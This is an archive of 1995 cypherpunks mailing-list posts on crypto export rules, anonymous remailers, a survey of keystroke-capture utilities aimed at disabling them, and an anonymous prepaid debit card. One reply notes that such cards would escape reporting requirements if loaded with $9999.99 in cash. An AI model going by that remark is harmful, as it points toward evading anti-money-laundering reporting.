Message-ID: <gate.gsgayc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Anon wrote:
> I want to publicly thank John Young for making articles available.  MOst of 
> those articles I would not otherwise have seen.  

I second that!

> that John offered.  Was there anyone in the world, well, in the cyberworld, who 
> was fooled by the article on the Microsoft acquisition of the Catholic church?  
> Anyone, who after reading that piece, considered anything other than the 
> creativity of the author, should be committed to St. John's Home for the 
> Desperately Dumb.  

Notice that Microsoft was flooded with complaints only after Rush Limbaugh
read it on his show...

> However, there was something in that article that was of concern.  If the 
> Massachusetts judge in the MIT student case actually said that he couldn't act 
> because Congress had not enacted any laws, then it is for sure they will try to 
> and they will try to act hurriedly.  Hurried actions by congress are even worse 

The Reuters report said:
   Although U.S. District Court Judge Richard Stearns was critical of
   LaMacchia's actions, he ruled he could not be prosecuted under a wire fraud
   statute because it could result in a flood of actions against home computer
   users copying even single software programmes for their own use.

Anonymity had nothing to do with it. It was clear cut copyright law - which
wouldn't have hurt LaMacchia as he wasn't making anything out of it, so they
tried to hit him with wire fraud, and the Judge found _that_ untenable.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc Horowitz <marc@cam.ov.com>
Date: Sun, 1 Jan 95 23:21:37 PST
To: Matt Blaze <mab@research.att.com>
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <9501020724.AA01894@dun-dun-noodles.cam.ov.com>
MIME-Version: 1.0
Content-Type: text/plain


>> My conclusion from all this is that it just isn't possible for an
>> individual traveler to follow the rules. 

I can think of a at least half a dozen cypherpunks who will be going
to IETF in Stockholm in July.  I suspect there are more.  Perhaps we
should all arrange to take the same flight, while carrying some bit of
approved-for-export material.  Should drive the Customs guys
completely nuts.

		Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@skypoint.com (Samuel Kaplin)
Date: Mon, 2 Jan 95 01:02:15 PST
To: cypherpunks@toad.com
Subject: Anonymous payment scheme
Message-ID: <qbx1lKjqRC$2075yn@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This idea just popped into my head, just as I was about to fall asleep.
Being the idiot that I am, I had to get up to write it down. This idea has
probably been presented before...but I haven't seen it here yet.

Let's suppose myself and 10,000 of my closest friends form the First
National Cypherpunk Bank and Trust. We go through all of the hassles in
order to be the issuer of a Master Card or Visa. Now instead of having a
credit line, it is set up as a debit card. The card's limit is how ever
much you have prepaid the bank in advance. Once you have hit your prepaid
amount the card no longer gets approved. Now because everything is prepaid,
there is no risk to me, so I'll put any name you want on the card. The
questions I have are:

Is this legal in the U.S.?

If so, is anyone doing it?

If it's not legal in the U.S., is it legal anyplace else.

If this is a gray area, why wouldn't this scheme work?

If this scheme was set up, it appears to me that the infrastructure for
anonymous payments/netcash is already in place. Of course the issuer would
get a healthy fee for issuing the card...but then again, there truly is
no such thing as a free lunch. As my 10,000 friends and I have no plans to
set this up, feel free to pick it apart at will. (which I'm sure it will
be)

Sam

==============================================================================

There is an order of things in this universe.
                -- Apollo, "Who Mourns for Adonais?" stardate 3468.1

==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLwe/6clnXxBRSgfNAQGZBAf9FAHHsI63OJ1uQo4SGAggs6Mk7BAe8Ysm
oxibQfvNMN0dSPdyLjHutEm5/rtyTrRjU731QRQSDLUi0LSC9I0N5/cQsGeI+VV8
kAIiuHDq1eF4oZmZTuKIcKz42THliSAhSTkmpL8dZvcU3sJVPwIfGK5dNbQyUQHw
J33h74Vg1jRIkeoodnAtTXPeUKi5HkcAp95zt8C/tGpke4+fx8QhqHSAvJgJoGdL
a8clRTdilqwDfrdQlpgKHt33T5aLiYuQA8m9NpMiDKw/wEF+XvMrHYrksIUyQ2ZD
gllxFl0WJcarRZTnIgtgAdA+hzQCbkfG10kcZUVTzquGcrgiKnp9ug==
=l5Mr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an172607@anon.penet.fi (duquesne duke)
Date: Sun, 1 Jan 95 19:48:12 PST
To: cypherpunks@toad.com
Subject: cnonymity, law and order
Message-ID: <9501020251.AA27454@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



I want to publicly thank John Young for making articles available.  MOst of 
those articles I would not otherwise have seen.  

I was particularly interested in Peter Lewis's article from the New York Tines 
that John offered.  Was there anyone in the world, well, in the cyberworld, who 
was fooled by the article on the Microsoft acquisition of the Catholic church?  
Anyone, who after reading that piece, considered anything other than the 
creativity of the author, should be committed to St. John's Home for the 
Desperately Dumb.  

However, there was something in that article that was of concern.  If the 
Massachusetts judge in the MIT student case actually said that he couldn't act 
because Congress had not enacted any laws, then it is for sure they will try to 
and they will try to act hurriedly.  Hurried actions by congress are even worse 
than their considered actions.  I think we need to keep in touch with our 
representatives and senators to make sure that all of the ramifications of any 
law are considered.  Sometimes laws passed by Congress are rather well 
intentioned, but the bureaucrats who write the policies and procedures by which 
the laws will be implemented can make them an albatross around our necks.  
These policy and procedure writers are dreadfully misinformed and are to 
enamored with their power and position to inform themselves.  

Admittedly, anonymity and law and order are not easy bed fellows, but difficult 
issues are never solved by hurried, uninformed, politically-motivated action.  
This puts some pressure on us cypherpunks.  We have to be ready to consider all 
aspects of the argument so that our presentation in favor of anonymity will be 
taken seriously.  







-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@skypoint.com (Samuel Kaplin)
Date: Mon, 2 Jan 95 02:17:01 PST
To: werewolf@io.org
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.BSI.3.91.950102041835.6592B-100000@wink.io.org>
Message-ID: <Jpy1lKjqRWH1075yn@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > Let's suppose myself and 10,000 of my closest friends form the First
> > National Cypherpunk Bank and Trust. We go through all of the hassles in
> > order to be the issuer of a Master Card or Visa. Now instead of having a
> > credit line, it is set up as a debit card. The card's limit is how ever
>
>
> Why jump through the hoops Visa or M/C would send you through if its a DEBIT
> card??? You don't need them for something like that, simply the
> acceptance of the Internet community, that credits from another user
> drawn on the Cypherpunk Bank would be accepted.....which leads to your next
> paragraph...

I was looking at at the bigger picture. Any merchant who accepts Visa or MC
could now accept anonymous payments. No hassle at all on their part. They
probably wouldn't even know that it was an anonymous account. It fits into
the existing infrastructure very nicely.

A bank in Minneapolis has a similar system in operation. They issue you a
Visa card. That card automatically debits your checking account. The key
would be not to have the card attached to the account. If the card is
attached to any type of account, then there are reporting requirements. A
more apt analogy would be the prepaid phone cards. Walk into the issuing
authority, plunk your $9999.99 on the counter and ask for your card. When
you've spent it all, toss the card.

Sam
==============================================================================

Marriage is like a cage; one sees the birds outside desperate to get in,
and those inside equally desperate to get out.
                         - Michel Eyquem de Montaigne

==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLwfRXMlnXxBRSgfNAQH0twf+Is7Gur7MlN1djLdLKQ5N1Qcf+9tM4hD8
II+4Z3lSFsCYV3K30Iochnqr+9am8C08LZYk0uUqhW/EEhCkHIlivBniIHXNgvZ/
XbTqiZyAwP7E+8CQNbNywoRqJ46WKRgQpvpDFgSDUmnUzQliRzoBzsU6cwJY+uYp
YLzpNkm+knleEDgAa978GaZsTK57wjkZ6ald2/gRoXzF4Pd0FW/lBd+KcSIq9KZN
hU/VJ3dh6NDqbXbu92RjCl+Ba+UL3Ljk/+k4Gc+aQOV5f6vghOYmsVy9pqjz8R7a
IfORPuLFYRDemWGjBF6vmWfkrOACdl6HLx5RdQd5eDfWqXFpDzE8eQ==
=Y8cO
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Terka <werewolf@io.org>
Date: Mon, 2 Jan 95 01:46:07 PST
To: Samuel Kaplin <skaplin@skypoint.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <qbx1lKjqRC$2075yn@skypoint.com>
Message-ID: <Pine.BSI.3.91.950102041835.6592B-100000@wink.io.org>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Jan 1995, Samuel Kaplin wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> This idea just popped into my head, just as I was about to fall asleep.
> Being the idiot that I am, I had to get up to write it down. This idea has

....best time for ideas....between sleep and wakefulness.....:>


> 
> Let's suppose myself and 10,000 of my closest friends form the First
> National Cypherpunk Bank and Trust. We go through all of the hassles in
> order to be the issuer of a Master Card or Visa. Now instead of having a
> credit line, it is set up as a debit card. The card's limit is how ever


Why jump through the hoops Visa or M/C would send you through if its a DEBIT
card??? You don't need them for something like that, simply the 
acceptance of the Internet community, that credits from another user 
drawn on the Cypherpunk Bank would be accepted.....which leads to your next
paragraph...

> much you have prepaid the bank in advance. Once you have hit your prepaid
> amount the card no longer gets approved. Now because everything is prepaid,
> there is no risk to me, so I'll put any name you want on the card. The
> questions I have are:

Sounds good.....and practical. ANY citizen in the world deposits with your
"Bank" legal tender in an account. US dollars would likely fit the bill as
they are pretty well accepted from North America to North Korea (black market
maybe.....but still accepted :>).

Then, when someone presents to your Bank proof of purchase/transfer etc
(a digitally signed message with your PGP Key perhaps?) then you transfer
a dollar figure from one account to another ...... assuming both purchaser
and seller have accounts atthe Cypherpunk Bank.

If the purchaser does.....but the SELLER doesn't, then (if so desired by
the seller) you have three choices:

   1) open an account, f/o (favour of.....sorry....I'm a Banker so pardon
      my lapsing now and agin into our jargon) of the seller, transferring
      in the requisite amount of US $ for the seller's later use (ie...
      then HE goes out and buys something over the 'Net).

   2) wire to the sellers account (overseas?) through a correspondent bank
      to the sellers bank where he has an account the US $.

   3) mail a draft in the appropriate US $ to the seller's designated address
      .....either snail mail or Fed Express, or whatever courier is selected.

> Is this legal in the U.S.?

Dunno....I'm in Canada. But I know that U.S. banking arrangements are
medieaval so I doubt it.

> If so, is anyone doing it?

See above :>

> If it's not legal in the U.S., is it legal anyplace else.

Sure.....Canada right now has a fully operational debit card system in place.
You go to a supplier to make a purchase and they run your bank card through
a machine just like your credit card for the purchase. Difference being, $$$
from your chequing account are debited, as opposed to to the line of credit
on your credit card being debited. You have dollars in the bank 
sufficient for the purchase, then no problem.


> If this is a gray area, why wouldn't this scheme work?

Its a perfectly workable scheme....IF...the BANK in question is trusted as
the medium of exchange. Thats the ONLY thing stopping its implementation,
namely having a trusted institution to handle the deposits/transfers.

Lets put it this way, I think the scheme would have ALOT more acceptance if
you as a seller presented your invoice for settlement at Chase Manhattan or
Bank of Montreal as opposed to the Cypherpunk Bank :>. 

> If this scheme was set up, it appears to me that the infrastructure for
> anonymous payments/netcash is already in place. Of course the issuer would

Sure it is....co-ordinating the infastructure would be interesting, but 
doable. The main thing is....is it economically viable for the institution
in question? Would there be enough commerce doneover the 'Net to justify
implementation of the supporting infrastructure (ie Internet hook-up's,
training of staff, etc).

Once there exists a demand for the service, coupled with a reasonable rate
of return to the Bank for provision of the service, then you'll see ALL
the top 20 banks in the world do it.

Until then, nobody will do it simply because the Cypherpunks think it is
a good idea. :>


<Sorry guys...I answered this online so no PGP sig this time.....>



--------------------------------------------------------------------------
Mark Terka     | werewolf@io.org             | public key (werewolf) by
Toronto,Canada | dg507@cleveland.freenet.edu | public key server or request
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Mon, 2 Jan 95 05:45:01 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <Jpy1lKjqRWH1075yn@skypoint.com>
Message-ID: <199501021344.FAA11566@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: skaplin@skypoint.com (Samuel Kaplin)

   I was looking at at the bigger picture. Any merchant who accepts Visa or MC
   could now accept anonymous payments. No hassle at all on their part. 
   [...]
   The key
   would be not to have the card attached to the account. If the card is
   attached to any type of account, then there are reporting requirements. 

Visa was talking about an electronic traveller's check, which, from
what I could tell, instantiated an account in the sum of the value of
the card purchased, which was then drawn down by purchase.  The card,
evidently, had no embossing on it.  Personalization was limited to
some account id which would last the lifetime of the balance and then
disappear.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 2 Jan 95 06:49:15 PST
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199501021450.GAA02030@kiwi.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.bsu.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp hash";
$remailer{"jpunix"} = "<remailer@jpunix.com> cpunk pgp hash latent cut post ek";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash";
$remailer{"soda"} = "<remailer@csua.berkeley.edu> eric post";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub";
$remailer{"usura"} = "<usura@replay.com> cpunk pgp. hash latent cut post";
$remailer{"desert"} = "<remail@desert.xs4all.nl> cpunk pgp. post";
$remailer{"nately"} = "<remailer@nately.ucsd.edu> cpunk pgp hash latent cut";
$remailer{"xs4all"} = "<remailer@xs4all.nl> cpunk pgp hash latent cut post ek";
$remailer{"flame"} = "<tomaz@flame.sinet.org> cpunk pgp hash latent cut post ek";
$remailer{"rahul"} = "<homer@rahul.net> cpunk";
$remailer{"mix"} = "<mixmaster@nately.ucsd.edu> cpunk hash latent cut ek";
$remailer{"q"} = "<q@c2.org> cpunk hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.

Last ping: Mon 2 Jan 95 6:00:02 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
nately   remailer@nately.ucsd.edu         +++++++++++*    32:53  99.99%
mix      mixmaster@nately.ucsd.edu        +++++++++-+     41:39  99.99%
rahul    homer@rahul.net                  --***#***#**     9:40  99.98%
penet    anon@anon.penet.fi               ********+***    26:09  99.99%
vox      remail@vox.xs4all.nl             .-..-------  12:53:05  99.99%
soda     remailer@csua.berkeley.edu       .-.._-.-..    8:50:49  99.67%
usura    usura@replay.com                 *****+- -- *    22:53  99.33%
flame    tomaz@flame.sinet.org            **  *-*-*-**    32:52  99.09%
jpunix   remailer@jpunix.com              **  *-#-*-**    32:26  99.06%
c2       remail@c2.org                    --__.-+*--**  2:50:57  98.95%
rebma    remailer@rebma.mn.org            ---*----*     7:52:32  99.27%
ideath   remailer@ideath.goldenbear.com   ++* ++**  -   2:09:26  98.05%
bsu-cs   nowhere@bsu-cs.bsu.edu           +*  --#+##**  1:40:45  96.01%
q        q@c2.org                         --_   . --+   6:03:15  92.56%
alumni   hal@alumni.caltech.edu           *****#*++ *-    27:00  89.60%
portal   hfinney@shell.portal.com         #*#**#*** *-    21:31  89.60%
extropia remail@extropia.wimsey.com       +.-+* +++    12:38:44  77.66%
xs4all   remailer@xs4all.nl                ***   *--      20:22  75.57%
desert   remail@desert.xs4all.nl          ----____.--  40:43:30  71.96%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   Options and features

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.

   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.

   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.

   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.

   oldpgp
          Remailer does not like messages encoded with MIT PGP 2.6. Other
          versions of PGP, including 2.3a and 2.6ui, work fine.

   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.

   ksub
          Remailer always kills subject header, even in non-pgp mode.

   nsub
          Remailer always preserves subject header, even in pgp mode.

   latent
          Supports Matt Ghio's Latent-Time: option.

   cut
          Supports Matt Ghio's Cutmarks: option.

   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   special
          Accepts only pgp encrypted messages.

   ek
          Encrypt responses in relpy blocks using Encrypt-Key:
          header.


   Comments and suggestions welcome!

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Mon, 2 Jan 95 06:36:02 PST
To: Marc Horowitz <marc@cam.ov.com>
Subject: Re: Exporting cryptographic materials, theory vs. practice
In-Reply-To: <9501020724.AA01894@dun-dun-noodles.cam.ov.com>
Message-ID: <199501021422.JAA00361@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> >> My conclusion from all this is that it just isn't possible for an
> >> individual traveler to follow the rules. 
> 
> I can think of a at least half a dozen cypherpunks who will be going
> to IETF in Stockholm in July.  I suspect there are more.  Perhaps we
> should all arrange to take the same flight, while carrying some bit of
> approved-for-export material.  Should drive the Customs guys
> completely nuts.

Actually, those of us who are going should arrange to take *separate*
flights...  My reading of Matt's message said that most of the time
was spent trying to figure out what to do, and only a little time was
spent actually doing it.  If a bunch of people all take the same
flight, it will take them only a slight bit longer to process the
whole bunch of you than if one person on the flight was doing it...

					- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwgMDLT+rHlVUGpxAQFJ4wP/VGVDeueP0Z2hFHy/LUZ65ed69RpwYv0X
//Ser1wiS7/y0WKFU6+xWH+0IffDOWgXVv4V3h1Rs8jTtEfKb46TtFTcnIM2qKr5
OYMy8ERPiMn3nx3I3slkVWYhSQQo/SwOOt/wSBZ72KjoSvWuf1wZCo++bOu773zp
mPN6RxAuR4c=
=R/1O
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rahul.net
Date: Mon, 2 Jan 95 09:25:20 PST
To: cypherpunks@toad.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <199501021725.AA09061@bolero.rahul.net>
MIME-Version: 1.0
Content-Type: text/plain


Matt has a good story, and the lesson that he draws, that presently the
average person can't follow the rules, seems valid.  But I don't see the
point of the proposals to replicate his experiment.

Doesn't Matt's experience really show simply that not enough people try
to follow the rules, so the agencies aren't set up yet to make it
easy?  Is it our goal to change this, to get Customs to streamline
their operation so that everyone really does register their crypto
equipment on travels overseas?  It seems to me we are better off with
the present informal system where you can actually use crypto overseas
without worrying much.

I could see a system where you routinely fill out and have your card
stamped when you check your luggage to show that you are carrying crypto.
Then you turn it in when you come back.  This might not be too different
from what you do now when you declare items you are taking out and
bringing back to show they are free of customs duties.  How does this
advance the CP cause?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Mon, 2 Jan 95 07:27:25 PST
To: cypherpunks@toad.com
Subject: exponential relationship of crytographer and cryptanalyst
Message-ID: <Pine.3.89.9501021008.A20482-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


-	I'm writing a piece on the politics of surveillance/privacy 
technologies for OMNI, essentially a survey of their advance since the 
1967 proposal for the National Data Center. I cover cryptography, 
deriving the narrative from Clipper Chip initiative. The point I'm trying 
to make is that given the market forces pushing commerce onto the public 
networks and the increasing power of available encryption, the cold war 
national apparatus will have to mobilize quickly a la digital telephony 
to stomp it - yet the nature of computing puts them in a loosing position 
in the long run. Toward the latter part of this thesis, I've been told - 
and want check with youz - of the exponential relationship of 
crytographer and cryptanalyst. The heart of this relationship has been 
explained to me as follows: Increasing the key by one bit effectively 
doubles the number of keys and proportionally increases the power 
required to break it in a brute force attack. Is this true? Is there a 
truer way of stating it? Are there complicating factors this excludes 
that I should discuss?
-				Regards,

-					Peter Cassidy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 2 Jan 95 11:03:09 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <v01510103ab2d756f56fa@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Samuel Kaplin wrote:

>Let's suppose myself and 10,000 of my closest friends form the First
>National Cypherpunk Bank and Trust. We go through all of the hassles in
>order to be the issuer of a Master Card or Visa. Now instead of having a
>credit line, it is set up as a debit card. The card's limit is how ever
>much you have prepaid the bank in advance. Once you have hit your prepaid
>amount the card no longer gets approved. Now because everything is prepaid,
>there is no risk to me, so I'll put any name you want on the card. The
>questions I have are:
>
>Is this legal in the U.S.?
>
>If so, is anyone doing it?

This type of card is issued with just about every checking accunt in
Oregon. I don't know about other states, except that here in California I
know of only two that are doing it: Charles Schwaab and Glendale Federal.
There may be more, but I have yet to hear about them. In Oregon you get
such an ATM/Visa card instead of your regular ATM card. Good credit, bad
credit, no credit. Now if I could just remember what its called...


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Mon, 2 Jan 95 12:17:47 PST
To: jRT <jrt@asiaonline.net>
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.3.89.9501030049.A16477-0100000@asiaonline.net>
Message-ID: <Pine.NXT.3.91.950102120713.12977A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, jRT wrote:

> 
> Well, I know some shops have so called 'switch' or 'smart' cards to debit 
> your account, some of these are on their own credit line, others are not.
> 
> I have an account with a bank in Britain which gives me a "VISA" Card 
> which is actually a 'direct-debit' card.  I can use it (and have) all 
> around the world as a regular VISA card and in any 'VISA compatible' ATM.

  Alot of the banks in the US are now offering these cards for use with 
checking accounts.

> 
> As soon as my balance drops to zero, I can no longer use it.  And when I 
> do, the money jumps out of my account immediately and can no longer be used.
> 
> This is a bank-issued card, and also acts as my ATM card to access my 
> current account - there is NO charge for this.  I'm not sure exactly how 
> that works.

  When a charge is made to the card it is subtracted from the balance 
until midnight? of that night. If the actual charge does not come in to 
the bank, the amount is then added back to the balance. (This was learned 
thru my GF who had some trouble with her card -- forgot to write down a 
couple of transactions and ended up at zero).

> 
> Whether or not VISA would accept a proposal from First National 
> Cyberphunks or not remains to be seen...

  I think they should. If they would is another matter. It would be 
similar to having a 'secret' Swiss bank account that can be accessed from 
anywhere in the world, converted to cash at cash machines, transferred to 
others, etc.

  I like the idea of an anonymous Visa better than some sort of new 
net-bank because it is already established, the mechanism for transfer is 
already in place, and for the most part de-bugged.

  If there was an Anonymous Visa debit card I'd defiantly go for it. It 
would certainly keep those marketing types from tracking my spending 
patterns.

    Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KEY-CAPTURE@lsd.com (Dave Del Torto)
Date: Mon, 2 Jan 95 13:00:53 PST
To: Key_Capture_Survey@lsd.com
Subject: RFC: Key Capture Utility Survey
Message-ID: <ab2dba2f01021003d685@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain



               REQUEST FOR COMMENTS ON KEY CAPTURE UTILITIES
               ---------------------------------------------

Key capture utilities present a serious threat to the security of passwords
on individual and networked computing systems, especially when novice users
are unaware of their presence. Well-educated users and administrators help
make all systems on and off the Internet more reliably safe for everyone's
data.

If you are a:

 -- privacy, system security or cryptography advocate/activist
 -- network admin concerned with the password-hygiene of your users or
 -- computing professional with an appreciation of good security,

then please complete and return this quick survey. By contributing to the
knowledgebase on the subject of password protection, you can help educate
yourself and many novice/intermediate users about a common weakness --
utilities that may capture their keystrokes unseen as they enter their
*password* -- in ALL secured systems (a user's encryption app, your network
or its dial-in access, your company's email system or database fileserver,
etc.).

The intent here is to create a *central list of all key-capture utilities*
which will help people to at least be aware of their existence or operation
on a given system and describe in simple terms how to disable the utility.

The results of the survey will be tabulated and put in the public domain on
the Internet. If your reply is included, your name will be acknowledged in
the resulting document, which will be: part of the new "Beginner's PGP FAQ"
for new users of the PGP (Pretty Good Privacy) application; a msg posted on
various Internet lists and online services and; a text file available by
anonymous FTP as:

   ftp.netcom.com:/pub/dd/ddt/crypto/crypto_info/key_cap_util.txt

Please forward this survey to anyone you think can/will help - and thanks
in advance for your contribution!

_______________________________
THE KEY CAPTURE UTILITY SURVEY:

The survey is very easy to participate in. Just send as much information as
you can, even if you're only partially able to complete the form. Every
piece of information that can lead us to the utility - even just a fragment
of a name and an email address of someone who might know more about it -
will help us compile a fairly exhaustive list. To assist us in easily
tabulating the incoming mail on this topic, please send your reply to:

- - <KEY-CAPTURE@lsd.com>
- - Format your answer as follows:


******* PLEASE RETURN ONLY THIS INFORMATION *******

      TO: KEY-CAPTURE@lsd.com
    SUBJ: PLATFORM/Utility Name
MSG BODY:
 [1] OPERATING-SYS                <--- i.e. WIN/DOS/MAC/OS2/UNIX, etc.
 [2] "Utility-Name" (utility-package-name, if not a stand-alone product)
 [3] Developer-Name (company-individual)
 [4] <developer-email-address>
 [5] Type                         <--- i.e.: system extension, autoexec, TSR
 [6] Path-to-file-location-when-loaded.
 [7] How to disable the utility's key capturing operations (step-by-step if
     possible). Please be brief, but aim for a novice level user. If disabling
     the key capturing is too complex to describe easily, then just explain
     what the user should ask a sys admin to do for them (while they watch, if
     applicable).
***************************************************



(Here's an Example:)
    SUBJ: MAC/Now Save
MSG BODY:
 [1] MAC
 [2] "Now Save" (Now Utilities v5.x), "NowSave" (Now Utilities v4.x)
 [3] Now Software, Inc.
 [4] <support@nowmail.nowsoft.com>
 [5] System extension/Control Panel device (CDEV)
 [6] [startup HD]:System Folder:Control Panels:Now Save (or :NowSave)
 [7] How to Disable:

     Open the "NowSave" (v4.x) or "Now Save" (v5.x) Control Panel.

     v4.x: Click the "Preferences" button.
           Click the "Key Capture..." button.
           Click the "OFF" radio button      (upper right corner of dialog).
           Click the "OK" button.

     v5.0: Click the "Key Capture..." button in the button-bar.
           Click the "OFF" radio button (in upper right corner of dialog).
           Click the "OK" button.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 2 Jan 95 13:04:22 PST
To: cypherpunks@toad.com
Subject: Reminder: January 14th "Tools Demo Day" Meeting
Message-ID: <199501022104.NAA01913@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



This is a reminder that the January 14th "Tools Demo Day" meeting is
coming up, standard place and time at the Silicon Graphics building in
Mountain View, CA.

I described this several weeks back and asked for folks interested in
demonstrating any sort of software tools, crypto code, languages,
etc., to get in contact with me. One person, Henry Strickland
(Strick), has done so. In any case, the meeting will go on.

I'll have my PowerMac 7100 there, and will demo some things like
Mathematica, SmalltalkAgents, MacPGP, etc. 

An SGI Unix box is of course available. An Intel box running something
of interest will presumably be brought by someone.

Anyone planning to demo something should either plan to run on a
machine they know will be there, or bring their own. 

A video projector is sometimes usable, and I plan to bring my video
camera. The idea is that laptops and other non-video out systems can
still be seen by lots of folks. (Someone mentioned also that an LCD
projector may be available.)

The normal meeting time is 12-5, but people usually spend the first
hour shmoozing and eating their burritos, so I plan on starting the
